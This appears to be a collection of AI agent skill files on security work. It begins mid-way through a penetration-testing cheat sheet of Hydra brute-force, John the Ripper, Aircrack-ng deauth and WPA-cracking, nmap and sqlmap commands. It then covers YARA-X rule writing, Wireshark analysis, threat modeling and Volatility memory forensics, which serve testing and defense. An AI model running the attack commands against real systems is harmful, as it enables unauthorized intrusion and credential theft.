hydra -L users.txt -P passwords.txt ssh://192.168.1.1
```
### 6. John the Ripper Commands
```bash
# Crack password file
john hash.txt
# Specify wordlist
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked passwords
john hash.txt --show
# Specify format
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
# SSH key passphrase
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# ZIP password
zip2john file.zip > zip_hash.txt
john zip_hash.txt
```
### 7. Aircrack-ng Commands
```bash
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```
### 8. Wireshark/Tshark Commands
```bash
# Capture traffic
tshark -i eth0 -w capture.pcap
# Read capture file
tshark -r capture.pcap
# Filter by protocol
tshark -r capture.pcap -Y "http"
# Filter by IP
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
# Extract HTTP data
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
```
## Quick Reference
### Common Port Scans
```bash
# Quick scan
nmap -F 192.168.1.1
# Full comprehensive
nmap -sV -sC -A -p- 192.168.1.1
# Fast with version
nmap -sV -T4 192.168.1.1
```
### Password Hash Types
| Hashcat Mode | Type |
|------|------|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast |
## Constraints
- Always have written authorization
- Some scans are noisy and detectable
- Brute forcing may lock accounts
- Rate limiting affects tools
## Examples
### Example 1: Quick Vulnerability Scan
```bash
nmap -sV --script vuln 192.168.1.1
```
### Example 2: Web App Test
```bash
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
```
## Troubleshooting
| Issue | Solution |
|-------|----------|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |
Write high-quality YARA-X detection rules for malware hunting. Covers atom selection, string optimization, false positive reduction, module usage (PE, ELF, M...
---
name: yara-authoring
version: 1.0.0
description: "Write high-quality YARA-X detection rules for malware hunting. Covers atom selection, string optimization, false positive reduction, module usage (PE, ELF, Macho), and Trail of Bits methodology. Includes rule templates and testing workflows."
---
# YARA-X Rule Authoring
Write detection rules that catch malware without drowning in false positives. Based on Trail of Bits methodology.
## Core Principles
1. **Strings must generate good atoms** — YARA extracts 4-byte subsequences for fast matching. Strings with repeated bytes, common sequences, or under 4 bytes force slow bytecode scans.
2. **Target specific families, not categories** — "Detects ransomware" is useless. "Detects LockBit 3.0 config extraction routine" is useful.
3. **Test against goodware** — Validate against clean file sets before deployment.
4. **Short-circuit with cheap checks first** — `filesize < 10MB and uint16(0) == 0x5A4D` before expensive string searches.
5. **Metadata is documentation** — Future you needs to know what this catches and why.
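Principle 1 can be turned into a quick pre-check on candidate strings. The heuristic below is a deliberately crude sketch, not YARA-X's actual atom scoring. It picks the 4-byte window with the most distinct bytes and flags strings whose best window is mostly repeats. The function names and the "2 or fewer distinct bytes" cutoff are assumptions.

```python
def best_atom(data: bytes, atom_len: int = 4):
    """Return the window of `atom_len` bytes with the most distinct byte
    values, or None if the string is shorter than one atom."""
    if len(data) < atom_len:
        return None
    windows = [data[i:i + atom_len] for i in range(len(data) - atom_len + 1)]
    return max(windows, key=lambda w: len(set(w)))


def looks_like_weak_atom(data: bytes) -> bool:
    """Flag strings that are too short or dominated by repeated bytes."""
    atom = best_atom(data)
    return atom is None or len(set(atom)) <= 2


for candidate in (b"MZ", b"\x00" * 6, b"VirtualAllocEx"):
    print(candidate, "weak" if looks_like_weak_atom(candidate) else "ok")
```

A string that passes this check can still be a poor choice if it is common in goodware. The check only covers the "repeated bytes or under 4 bytes" part of the principle.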
## YARA-X Basics
YARA-X is the Rust successor to legacy YARA: 5-10x faster, better errors, built-in formatter, stricter validation, new modules (crx, dex).
**Install:** `brew install yara-x` / `cargo install yara-x`
**Commands:** `yr scan`, `yr check`, `yr fmt`, `yr dump`
## Rule Template
```yara
import "pe"
rule FamilyName_Variant_Technique : tag1 tag2 {
meta:
author = "Your Name"
date = "2026-02-14"
description = "Detects [specific behavior] in [malware family]"
reference = "https://..."
tlp = "TLP:WHITE"
hash = ""
score = 75 // 0-100 confidence
strings:
// Unique strings from the sample
$api1 = "VirtualAllocEx" ascii
$api2 = "WriteProcessMemory" ascii
$str1 = { 48 8B 05 ?? ?? ?? ?? 48 85 C0 } // hex with wildcards
$pdb = /[A-Z]:\\.*\\Release\\.*\.pdb/ nocase
condition:
uint16(0) == 0x5A4D and
filesize < 5MB and
((2 of ($api*) and $str1) or $pdb) // parenthesized so $pdb alone cannot bypass the header and size checks
}
```
## Naming Convention
`Family_Variant_Technique` — examples:
- `Emotet_Loader_DocumentMacro`
- `CobaltStrike_Beacon_x64`
- `Generic_Cryptominer_XMRig`
## String Selection
**Good strings (unique, specific):**
- Mutex names, PDB paths, C2 URLs
- Unique byte sequences from disassembly
- Custom encryption constants
- Uncommon API call sequences
**Bad strings (too common, high FP):**
- `http://`, `https://`, common API names alone
- Single common words, short strings (<4 bytes)
- Strings found in Windows system files
## Condition Patterns
```yara
// Performance-ordered (cheap → expensive)
condition:
uint16(0) == 0x5A4D and // Magic bytes (instant)
filesize < 10MB and // Size filter (instant)
2 of ($unique*) and // String matching (fast)
pe.imports("kernel32.dll") // Module check (slower)
```
**Common magic bytes:**
| Platform | Check |
|----------|-------|
| PE (Windows) | `uint16(0) == 0x5A4D` |
| ELF (Linux) | `uint32(0) == 0x464C457F` |
| Mach-O 64-bit | `uint32(0) == 0xFEEDFACF` |
| PDF | `uint32be(0) == 0x25504446` |
| Office/ZIP | `uint32be(0) == 0x504B0304` |
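YARA's `uint16` and `uint32` read little-endian integers, while `uint16be` and `uint32be` read big-endian, so the constant in a magic-byte check depends on which function is used. The sketch below uses Python's `struct` module to show how the same header bytes map to each form. The `HEADERS` dict holds the well-known leading bytes for each format.

```python
import struct

# Leading bytes of each file format as they appear on disk.
HEADERS = {
    "PE": b"MZ",
    "ELF": b"\x7fELF",
    "PDF": b"%PDF",
    "ZIP": b"PK\x03\x04",
}


def uint16_le(data: bytes) -> int:
    return struct.unpack_from("<H", data)[0]


def uint32_le(data: bytes) -> int:
    return struct.unpack_from("<I", data)[0]


def uint32_be(data: bytes) -> int:
    return struct.unpack_from(">I", data)[0]


for name, header in HEADERS.items():
    if len(header) >= 4:
        print(f"{name}: uint32 = 0x{uint32_le(header):08X}, "
              f"uint32be = 0x{uint32_be(header):08X}")
    else:
        print(f"{name}: uint16 = 0x{uint16_le(header):04X}")
```

Constants written in on-disk byte order (such as `0x25504446` for `%PDF`) pair with the `be` variants. The byte-swapped form pairs with plain `uint32`.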
## Performance Rules
1. Put `filesize` and magic byte checks FIRST in condition
2. Never use unbounded regex like `/.*/`
3. Avoid `for all` with complex conditions on large files
4. Use `ascii` or `wide`, not both unless needed
5. Hex strings with specific bytes > wildcards > regex
6. Use `at` for fixed offsets instead of scanning entire file
## Testing
```bash
# Validate syntax
yr check rules/
# Scan a sample
yr scan rules/my_rule.yar suspicious_file.exe
# Scan directory
yr scan rules/ samples/ --threads 4
# Format rules consistently
yr fmt rules/my_rule.yar
```
## False Positive Reduction
- Add `filesize` constraints (malware has typical size ranges)
- Require multiple string matches (`2 of ($str*)` not `any of`)
- Exclude known good paths/publishers via `not` conditions
- Score-based approach: assign confidence scores in metadata, triage by threshold
- Test against goodware corpus before deployment
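The score-based approach can be sketched as a split over scan results. This assumes matches have already been collected into dicts with hypothetical `rule` and `score` keys, where `score` is copied from the rule's metadata. The threshold of 70 is an arbitrary example value.

```python
def triage(matches, threshold=70):
    """Split matches into (alert, review) lists by metadata score.
    Alerts are sorted with the highest score first."""
    alert = sorted(
        (m for m in matches if m["score"] >= threshold),
        key=lambda m: m["score"],
        reverse=True,
    )
    review = [m for m in matches if m["score"] < threshold]
    return alert, review


# Hypothetical scan results; rule names follow the naming convention.
matches = [
    {"rule": "Generic_Cryptominer_XMRig", "score": 40},
    {"rule": "CobaltStrike_Beacon_x64", "score": 90},
    {"rule": "Emotet_Loader_DocumentMacro", "score": 75},
]
alert, review = triage(matches)
print([m["rule"] for m in alert], [m["rule"] for m in review])
```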
## Reference
Full methodology, module docs (pe, elf, crx, dex), and migration guide from legacy YARA:
https://github.com/trailofbits/skills/tree/main/plugins/yara-authoring
Network traffic analysis with Wireshark and tshark. Capture packets, write display and BPF filters, follow TCP/UDP/TLS streams, detect C2 beacons, troublesho...
---
name: Wireshark Network Traffic Analysis
version: 1.0.0
description: "Network traffic analysis with Wireshark and tshark. Capture packets, write display and BPF filters, follow TCP/UDP/TLS streams, detect C2 beacons, troubleshoot connectivity, and perform forensic PCAP analysis."
metadata:
  author: zebbern
  version: "1.1"
---
# Wireshark Network Traffic Analysis
## Purpose
Execute comprehensive network traffic analysis using Wireshark to capture, filter, and examine network packets for security investigations, performance optimization, and troubleshooting. This skill enables systematic analysis of network protocols, detection of anomalies, and reconstruction of network conversations from PCAP files.
## Inputs / Prerequisites
### Required Tools
- Wireshark installed (Windows, macOS, or Linux)
- Network interface with capture permissions
- PCAP/PCAPNG files for offline analysis
- Administrator/root privileges for live capture
### Technical Requirements
- Understanding of network protocols (TCP, UDP, HTTP, DNS)
- Familiarity with IP addressing and ports
- Knowledge of OSI model layers
- Understanding of common attack patterns
### Use Cases
- Network troubleshooting and connectivity issues
- Security incident investigation
- Malware traffic analysis
- Performance monitoring and optimization
- Protocol learning and education
## Outputs / Deliverables
### Primary Outputs
- Filtered packet captures for specific traffic
- Reconstructed communication streams
- Traffic statistics and visualizations
- Evidence documentation for incidents
## Core Workflow
### Phase 1: Capturing Network Traffic
#### Start Live Capture
Begin capturing packets on network interface:
```
1. Launch Wireshark
2. Select network interface from main screen
3. Click shark fin icon or double-click interface
4. Capture begins immediately
```
#### Capture Controls
| Action | Shortcut | Description |
|--------|----------|-------------|
| Start/Stop Capture | Ctrl+E | Toggle capture on/off |
| Restart Capture | Ctrl+R | Stop and start new capture |
| Open PCAP File | Ctrl+O | Load existing capture file |
| Save Capture | Ctrl+S | Save current capture |
#### Capture Filters
Apply filters before capture to limit data collection:
```
# Capture only specific host
host 192.168.1.100
# Capture specific port
port 80
# Capture specific network
net 192.168.1.0/24
# Exclude specific traffic
not arp
# Combine filters
host 192.168.1.100 and port 443
```
### Phase 2: Display Filters
#### Basic Filter Syntax
Filter captured packets for analysis:
```
# IP address filters
ip.addr == 192.168.1.1    # All traffic to/from IP
ip.src == 192.168.1.1     # Source IP only
ip.dst == 192.168.1.1     # Destination IP only
# Port filters
tcp.port == 80            # TCP port 80
udp.port == 53            # UDP port 53
tcp.dstport == 443        # Destination port 443
tcp.srcport == 22         # Source port 22
```
#### Protocol Filters
Filter by specific protocols:
```
# Common protocols
http          # HTTP traffic
tls           # TLS-encrypted traffic, including HTTPS (ssl is the legacy filter name)
dns           # DNS queries and responses
ftp           # FTP traffic
ssh           # SSH traffic
icmp          # Ping/ICMP traffic
arp           # ARP requests/responses
dhcp          # DHCP traffic
smb or smb2   # SMB file sharing
```
#### TCP Flag Filters
Identify specific connection states:
```
tcp.flags.syn == 1      # SYN packets (connection attempts)
tcp.flags.ack == 1      # ACK packets
tcp.flags.fin == 1      # FIN packets (connection close)
tcp.flags.reset == 1    # RST packets (connection reset)
tcp.flags.syn == 1 && tcp.flags.ack == 0    # SYN-only (initial connection)
```
#### Content Filters
Search for specific content:
```
frame contains "password"            # Packets containing string
http.request.uri contains "login"    # HTTP URIs with string
tcp contains "GET"                   # TCP packets with string
```
#### Analysis Filters
Identify potential issues:
```
tcp.analysis.retransmission    # TCP retransmissions
tcp.analysis.duplicate_ack     # Duplicate ACKs
tcp.analysis.zero_window       # Zero window (flow control)
tcp.analysis.flags             # Packets with issues
dns.flags.rcode != 0           # DNS errors
```
#### Combining Filters
Use logical operators for complex queries:
```
# AND operator
ip.addr == 192.168.1.1 && tcp.port == 80
# OR operator
dns || http
# NOT operator
!(arp || icmp)
# Complex combinations
(ip.src == 192.168.1.1 || ip.src == 192.168.1.2) && tcp.port == 443
```
### Phase 3: Following Streams
#### TCP Stream Reconstruction
View complete TCP conversation:
```
1. Right-click on any TCP packet
2. Select Follow > TCP Stream
3. View reconstructed conversation
4. Toggle between ASCII, Hex, Raw views
5. Filter to show only this stream
```
#### Stream Types
| Stream | Access | Use Case |
|--------|--------|----------|
| TCP Stream | Follow > TCP Stream | Web, file transfers, any TCP |
| UDP Stream | Follow > UDP Stream | DNS, VoIP, streaming |
| HTTP Stream | Follow > HTTP Stream | Web content, headers |
| TLS Stream | Follow > TLS Stream | Encrypted traffic (if keys available) |
#### Stream Analysis Tips
- Review request/response pairs
- Identify transmitted files or data
- Look for credentials in plaintext
- Note unusual patterns or commands
### Phase 4: Statistical Analysis
#### Protocol Hierarchy
View protocol distribution:
```
Statistics > Protocol Hierarchy
Shows:
- Percentage of each protocol
- Packet counts
- Bytes transferred
- Protocol breakdown tree
```
#### Conversations
Analyze communication pairs:
```
Statistics > Conversations
Tabs:
- Ethernet: MAC address pairs
- IPv4/IPv6: IP address pairs
- TCP: Connection details (ports, bytes, packets)
- UDP: Datagram exchanges
```
#### Endpoints
View active network participants:
```
Statistics > Endpoints
Shows:
- All source/destination addresses
- Packet and byte counts
- Geographic information (if enabled)
```
#### Flow Graph
Visualize packet sequence:
```
Statistics > Flow Graph
Options:
- All packets or displayed only
- Standard or TCP flow
- Shows packet timing and direction
```
#### I/O Graphs
Plot traffic over time:
```
Statistics > I/O Graph
Features:
- Packets per second
- Bytes per second
- Custom filter graphs
- Multiple graph overlays
```
### Phase 5: Security Analysis
#### Detect Port Scanning
Identify reconnaissance activity:
```
# SYN scan detection (many ports, same source)
ip.src == SUSPECT_IP && tcp.flags.syn == 1
# Review Statistics > Conversations for anomalies
# Look for single source hitting many destination ports
```
#### Identify Suspicious Traffic
Filter for anomalies:
```
# Traffic to unusual ports
tcp.dstport > 1024 && tcp.dstport < 49152
# Traffic outside trusted network
!(ip.addr == 192.168.1.0/24)
# Unusual DNS queries
dns.qry.name contains "suspicious-domain"
# Large data transfers
frame.len > 1400
```
#### ARP Spoofing Detection
Identify ARP attacks:
```
# Duplicate ARP responses
arp.duplicate-address-frame
# ARP traffic analysis
arp
# Look for:
# - Multiple MACs for same IP
# - Gratuitous ARP floods
# - Unusual ARP patterns
```
#### Examine Downloads
Analyze file transfers:
```
# HTTP file downloads (Content-Disposition is a response header, so match responses)
http.response && http contains "Content-Disposition"
# Follow HTTP Stream to view file content
# Use File > Export Objects > HTTP to extract files
```
#### DNS Analysis
Investigate DNS activity:
```
# All DNS traffic
dns
# DNS queries only
dns.flags.response == 0
# DNS responses only
dns.flags.response == 1
# Failed DNS lookups
dns.flags.rcode != 0
# Specific domain queries
dns.qry.name contains "domain.com"
```
### Phase 6: Expert Information
#### Access Expert Analysis
View Wireshark's automated findings:
```
Analyze > Expert Information
Categories:
- Errors: Critical issues
- Warnings: Potential problems
- Notes: Informational items
- Chats: Normal conversation events
```
#### Common Expert Findings
| Finding | Meaning | Action |
|---------|---------|--------|
| TCP Retransmission | Packet resent | Check for packet loss |
| Duplicate ACK | Possible loss | Investigate network path | | Zero Window | Buffer full | Check receiver performance | | RST | Connection reset | Check for blocks/errors | | Out-of-Order | Packets reordered | Usually normal, excessive is issue | ## Quick Reference ### Keyboard Shortcuts | Action | Shortcut | |--------|----------| | Open file | Ctrl+O | | Save file | Ctrl+S | | Start/Stop capture | Ctrl+E | | Find packet | Ctrl+F | | Go to packet | Ctrl+G | | Next packet | ↓ | | Previous packet | ↑ | | First packet | Ctrl+Home | | Last packet | Ctrl+End | | Apply filter | Enter | | Clear filter | Ctrl+Shift+X | ### Common Filter Reference ``` # Web traffic http || https # Email smtp || pop || imap # File sharing smb || smb2 || ftp # Authentication ldap || kerberos # Network management snmp || icmp # Encrypted tls || ssl ``` ### Export Options ``` File > Export Specified Packets # Save filtered subset File > Export Objects > HTTP # Extract HTTP files File > Export Packet Dissections # Export as text/CSV ``` ## Constraints and Guardrails ### Operational Boundaries - Capture only authorized network traffic - Handle captured data according to privacy policies - Avoid capturing sensitive credentials unnecessarily - Properly secure PCAP files containing sensitive data ### Technical Limitations - Large captures consume significant memory - Encrypted traffic content not visible without keys - High-speed networks may drop packets - Some protocols require plugins for full decoding ### Best Practices - Use capture filters to limit data collection - Save captures regularly during long sessions - Use display filters rather than deleting packets - Document analysis findings and methodology ## Examples ### Example 1: HTTP Credential Analysis **Scenario**: Investigate potential plaintext credential transmission ``` 1. Filter: http.request.method == "POST" 2. Look for login forms 3. Follow HTTP Stream 4. 
Search for username/password parameters ``` **Finding**: Credentials transmitted in cleartext form data. ### Example 2: Malware C2 Detection **Scenario**: Identify command and control traffic ``` 1. Filter: dns 2. Look for unusual query patterns 3. Check for high-frequency beaconing 4. Identify domains with random-looking names 5. Filter: ip.dst == SUSPICIOUS_IP 6. Analyze traffic patterns ``` **Indicators**: - Regular timing intervals - Encoded/encrypted payloads - Unusual ports or protocols ### Example 3: Network Troubleshooting **Scenario**: Diagnose slow web application ``` 1. Filter: ip.addr == WEB_SERVER 2. Check Statistics > Service Response Time 3. Filter: tcp.analysis.retransmission 4. Review I/O Graph for patterns 5. Check for high latency or packet loss ``` **Finding**: TCP retransmissions indicating network congestion. ## Troubleshooting ### No Packets Captured - Verify correct interface selected - Check for admin/root permissions - Confirm network adapter is active - Disable promiscuous mode if issues persist ### Filter Not Working - Verify filter syntax (red = error) - Check for typos in field names - Use Expression button for valid fields - Clear filter and rebuild incrementally ### Performance Issues - Use capture filters to limit traffic - Split large captures into smaller files - Disable name resolution during capture - Close unnecessary protocol dissectors ### Cannot Decrypt TLS/SSL - Obtain server private key - Configure at Edit > Preferences > Protocols > TLS - For ephemeral keys, capture pre-master secret from browser - Some modern ciphers cannot be decrypted passively
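The "regular timing intervals" indicator from Example 2 can be checked numerically once packet timestamps have been exported, for instance with `tshark -r capture.pcap -Y "ip.dst == SUSPICIOUS_IP" -T fields -e frame.time_epoch`. The sketch below is one possible heuristic, not a Wireshark feature: it measures how much the gaps between packets vary. The function names and the `max_cv` and `min_events` thresholds are illustrative assumptions and would need tuning against real traffic.

```python
from statistics import mean, pstdev


def interval_stats(timestamps):
    """Return (mean interval, coefficient of variation) for packet times in seconds."""
    ordered = sorted(timestamps)
    intervals = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    if len(intervals) < 2:
        return None
    average = mean(intervals)
    if average == 0:
        return None
    # Coefficient of variation: spread of the gaps relative to their mean.
    return average, pstdev(intervals) / average


def looks_like_beacon(timestamps, max_cv=0.1, min_events=5):
    """Heuristic: many events with nearly constant spacing suggest beaconing.

    max_cv and min_events are assumed defaults, not established thresholds.
    """
    if len(timestamps) < min_events:
        return False
    stats = interval_stats(timestamps)
    return stats is not None and stats[1] <= max_cv


if __name__ == "__main__":
    regular = [0, 60, 120.5, 180, 240.2, 300]
    print(looks_like_beacon(regular))
```

Malware that adds jitter to its sleep interval will raise the coefficient of variation, so a negative result does not rule out C2 traffic.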
---
name: threat-modeling-expert
version: 1.0.0
description: "Threat modeling with STRIDE, PASTA, and attack trees. Analyze architectures for security gaps, extract security requirements, build data flow diagrams, and prioritize risks. For secure-by-design planning and security architecture reviews."
---
# Threat Modeling Expert
Expert in threat modeling methodologies, security architecture review, and risk assessment. Masters STRIDE, PASTA, attack trees, and security requirement extraction. Use PROACTIVELY for security architecture reviews, threat identification, or building secure-by-design systems.
## Capabilities
- STRIDE threat analysis
- Attack tree construction
- Data flow diagram analysis
- Security requirement extraction
- Risk prioritization and scoring
- Mitigation strategy design
- Security control mapping
## Use this skill when
- Designing new systems or features
- Reviewing architecture for security gaps
- Preparing for security audits
- Identifying attack vectors
- Prioritizing security investments
- Creating security documentation
- Training teams on security thinking
## Do not use this skill when
- You lack scope or authorization for security review
- You need legal or compliance certification
- You only need automated scanning without human review
## Instructions
1. Define system scope and trust boundaries
2. Create data flow diagrams
3. Identify assets and entry points
4. Apply STRIDE to each component
5. Build attack trees for critical paths
6. Score and prioritize threats
7. Design mitigations
8. Document residual risks
## Safety
- Avoid storing sensitive details in threat models without access controls.
- Keep threat models updated after architecture changes.
## Best Practices
- Involve developers in threat modeling sessions
- Focus on data flows, not just components
- Consider insider threats
- Update threat models with architecture changes
- Link threats to security requirements
- Track mitigations to implementation
- Review regularly, not just at design time
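Steps 4 and 6 of the instructions ("Apply STRIDE to each component" and "Score and prioritize threats") can be sketched in a few lines. The example below assumes the commonly cited STRIDE-per-element mapping between data flow diagram element types and threat categories, and a simple likelihood times impact score on a 1 to 5 scale. Neither the mapping table nor the scoring scheme comes from this skill; both are stand-ins for whatever method a team actually adopts.

```python
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}

# Assumed STRIDE-per-element mapping; adjust to the methodology in use.
APPLICABLE = {
    "external_entity": "SR",
    "process": "STRIDE",
    "data_store": "TRID",  # R mainly applies to stores that hold audit logs
    "data_flow": "TID",
}


def enumerate_threats(elements):
    """Expand (name, element_type) pairs into (name, threat category) candidates."""
    candidates = []
    for name, kind in elements:
        for letter in APPLICABLE[kind]:
            candidates.append((name, STRIDE[letter]))
    return candidates


def prioritize(threats):
    """Sort threat dicts by likelihood * impact, highest first (illustrative scoring)."""
    return sorted(threats, key=lambda t: t["likelihood"] * t["impact"], reverse=True)


if __name__ == "__main__":
    diagram = [("Browser", "external_entity"), ("API", "process"), ("Orders DB", "data_store")]
    for element, category in enumerate_threats(diagram):
        print(f"{element}: {category}")
```

The enumeration only produces candidates; each one still needs a human decision on whether it is realistic for the system in scope.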
---
name: memory-forensics
version: 1.0.0
description: "Memory forensics with Volatility and related tools. Acquire RAM dumps, extract processes and DLLs, investigate rootkits and fileless malware, recover credentials from memory, and reconstruct timelines from memory images."
---
# Memory Forensics
Comprehensive techniques for acquiring, analyzing, and extracting artifacts from memory dumps for incident response and malware analysis.
## Use this skill when
- Working on memory forensics tasks or workflows
- Needing guidance, best practices, or checklists for memory forensics
## Do not use this skill when
- The task is unrelated to memory forensics
- You need a different domain or tool outside this scope
## Instructions
- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.
## Memory Acquisition
### Live Acquisition Tools
#### Windows
```powershell
# WinPmem (Recommended)
winpmem_mini_x64.exe memory.raw
# DumpIt
DumpIt.exe
# Belkasoft RAM Capturer
# GUI-based, outputs raw format
# Magnet RAM Capture
# GUI-based, outputs raw format
```
#### Linux
```bash
# LiME (Linux Memory Extractor)
sudo insmod lime.ko "path=/tmp/memory.lime format=lime"
# /dev/mem (limited, requires permissions)
sudo dd if=/dev/mem of=memory.raw bs=1M
# /proc/kcore (ELF format)
sudo cp /proc/kcore memory.elf
```
#### macOS
```bash
# osxpmem
sudo ./osxpmem -o memory.raw
# MacQuisition (commercial)
```
### Virtual Machine Memory
```bash
# VMware: .vmem file is raw memory
cp vm.vmem memory.raw
# VirtualBox: Use debug console
vboxmanage debugvm "VMName" dumpvmcore --filename memory.elf
# QEMU/KVM via libvirt (--memory-only writes an ELF core by default)
virsh dump <domain> memory.elf --memory-only
# Hyper-V
# Checkpoint contains memory state
```
## Volatility 3 Framework
### Installation and Setup
```bash
# Install Volatility 3
pip install volatility3
# Install symbol tables (Windows)
# Download from https://downloads.volatilityfoundation.org/volatility3/symbols/
# Basic usage
vol -f memory.raw <plugin>
# With symbol path
vol -f memory.raw -s /path/to/symbols windows.pslist
```
### Essential Plugins
#### Process Analysis
```bash
# List processes
vol -f memory.raw windows.pslist
# Process tree (parent-child relationships)
vol -f memory.raw windows.pstree
# Hidden process detection
vol -f memory.raw windows.psscan
# Process memory dumps
vol -f memory.raw windows.memmap --pid <PID> --dump
# Process environment variables
vol -f memory.raw windows.envars --pid <PID>
# Command line arguments
vol -f memory.raw windows.cmdline
```
#### Network Analysis
```bash
# Network connections
vol -f memory.raw windows.netscan
# Network connection state
vol -f memory.raw windows.netstat
```
#### DLL and Module Analysis
```bash
# Loaded DLLs per process
vol -f memory.raw windows.dlllist --pid <PID>
# Find hidden/injected DLLs
vol -f memory.raw windows.ldrmodules
# Kernel modules
vol -f memory.raw windows.modules
# Module dumps (moddump is a Volatility 2 plugin; Volatility 3 uses --dump on modules)
vol -f memory.raw windows.modules --dump
```
#### Memory Injection Detection
```bash
# Detect code injection
vol -f memory.raw windows.malfind
# VAD (Virtual Address Descriptor) analysis
vol -f memory.raw windows.vadinfo --pid <PID>
# Scan process VAD regions with YARA rules from a file
vol -f memory.raw windows.vadyarascan --yara-file rules.yar
```
#### Registry Analysis
```bash
# List registry hives
vol -f memory.raw windows.registry.hivelist
# Print registry key
vol -f memory.raw windows.registry.printkey --key "Software\Microsoft\Windows\CurrentVersion\Run"
# Dump registry hives (the --dump option belongs to hivelist)
vol -f memory.raw windows.registry.hivelist --dump
```
#### File System Artifacts
```bash
# Scan for file objects
vol -f memory.raw windows.filescan
# Dump files from memory
vol -f memory.raw windows.dumpfiles --pid <PID>
# MFT analysis
vol -f memory.raw windows.mftscan
```
### Linux Analysis
```bash
# Process listing
vol -f memory.raw linux.pslist
# Process tree
vol -f memory.raw linux.pstree
# Bash history
vol -f memory.raw linux.bash
# Network connections
vol -f memory.raw linux.sockstat
# Loaded kernel modules
vol -f memory.raw linux.lsmod
# Mount points
vol -f memory.raw linux.mountinfo
# Environment variables
vol -f memory.raw linux.envars
```
### macOS Analysis
```bash
# Process listing
vol -f memory.raw mac.pslist
# Process tree
vol -f memory.raw mac.pstree
# Network connections
vol -f memory.raw mac.netstat
# Kernel extensions
vol -f memory.raw mac.lsmod
```
## Analysis Workflows
### Malware Analysis Workflow
```bash
# 1. Initial process survey
vol -f memory.raw windows.pstree > processes.txt
vol -f memory.raw windows.pslist > pslist.txt
# 2. Network connections
vol -f memory.raw windows.netscan > network.txt
# 3. Detect injection
vol -f memory.raw windows.malfind > malfind.txt
# 4. Analyze suspicious processes
vol -f memory.raw windows.dlllist --pid <PID>
vol -f memory.raw windows.handles --pid <PID>
# 5. Dump suspicious executables
vol -f memory.raw windows.pslist --pid <PID> --dump
# 6. Extract strings from dumps (dump file names vary by Volatility version)
strings -a <dumped_file> > strings.txt
# 7. YARA scanning of process memory
vol -f memory.raw windows.vadyarascan --yara-file malware.yar
```
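When the same survey is run against many images, it can help to generate the command lines rather than retype them. The sketch below only builds argument lists for the `vol` invocations used in steps 1 to 3; `build_vol_command` and `survey_commands` are hypothetical helper names, and the keyword-to-flag convention (for example `pid=1234` becoming `--pid 1234`) is an assumption of this sketch rather than part of Volatility.

```python
import subprocess

SURVEY_PLUGINS = [
    "windows.pstree",
    "windows.pslist",
    "windows.netscan",
    "windows.malfind",
]


def build_vol_command(image, plugin, renderer=None, **options):
    """Build an argument list such as ['vol', '-f', image, plugin, '--pid', '1234']."""
    command = ["vol"]
    if renderer:
        command += ["-r", renderer]  # global option, placed before the plugin name
    command += ["-f", image, plugin]
    for key, value in options.items():
        flag = "--" + key.replace("_", "-")
        if value is True:
            command.append(flag)  # boolean switch such as --dump
        elif value not in (False, None):
            command += [flag, str(value)]
    return command


def survey_commands(image):
    """Return the commands for the initial process, network, and injection survey."""
    return [build_vol_command(image, plugin) for plugin in SURVEY_PLUGINS]


def run_to_file(command, output_path):
    """Run one command and save its stdout; requires Volatility 3 on PATH."""
    with open(output_path, "w", encoding="utf-8") as handle:
        subprocess.run(command, stdout=handle, text=True, check=True)
```

Passing argument lists to `subprocess.run` avoids shell quoting problems with image paths that contain spaces.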
### Incident Response Workflow
```bash
# 1. Timeline of events (timeliner is a top-level plugin; -r csv selects CSV output)
vol -r csv -f memory.raw timeliner > timeline.csv
# 2. User activity
vol -f memory.raw windows.cmdline
vol -f memory.raw windows.consoles
# 3. Persistence mechanisms
vol -f memory.raw windows.registry.printkey \
--key "Software\Microsoft\Windows\CurrentVersion\Run"
# 4. Services
vol -f memory.raw windows.svcscan
# 5. Scheduled tasks
vol -f memory.raw windows.scheduled_tasks
# 6. Recent files
vol -f memory.raw windows.filescan | grep -i "recent"
```
## Data Structures
### Windows Process Structures
```c
// EPROCESS (Executive Process), simplified: field order and offsets vary by Windows build
typedef struct _EPROCESS {
KPROCESS Pcb; // Kernel process block
EX_PUSH_LOCK ProcessLock;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
// ...
LIST_ENTRY ActiveProcessLinks; // Doubly-linked list
ULONG_PTR UniqueProcessId; // PID
// ...
PEB* Peb; // Process Environment Block
// ...
} EPROCESS;
// PEB (Process Environment Block)
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged; // Anti-debug check
// ...
PVOID ImageBaseAddress; // Base address of executable
PPEB_LDR_DATA Ldr; // Loader data (DLL list)
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
// ...
} PEB;
```
### VAD (Virtual Address Descriptor)
```c
typedef struct _MMVAD {
MMVAD_SHORT Core;
union {
ULONG LongFlags;
MMVAD_FLAGS VadFlags;
} u;
// ...
PVOID FirstPrototypePte;
PVOID LastContiguousPte;
// ...
PFILE_OBJECT FileObject;
} MMVAD;
// Memory protection flags
#define PAGE_EXECUTE 0x10
#define PAGE_EXECUTE_READ 0x20
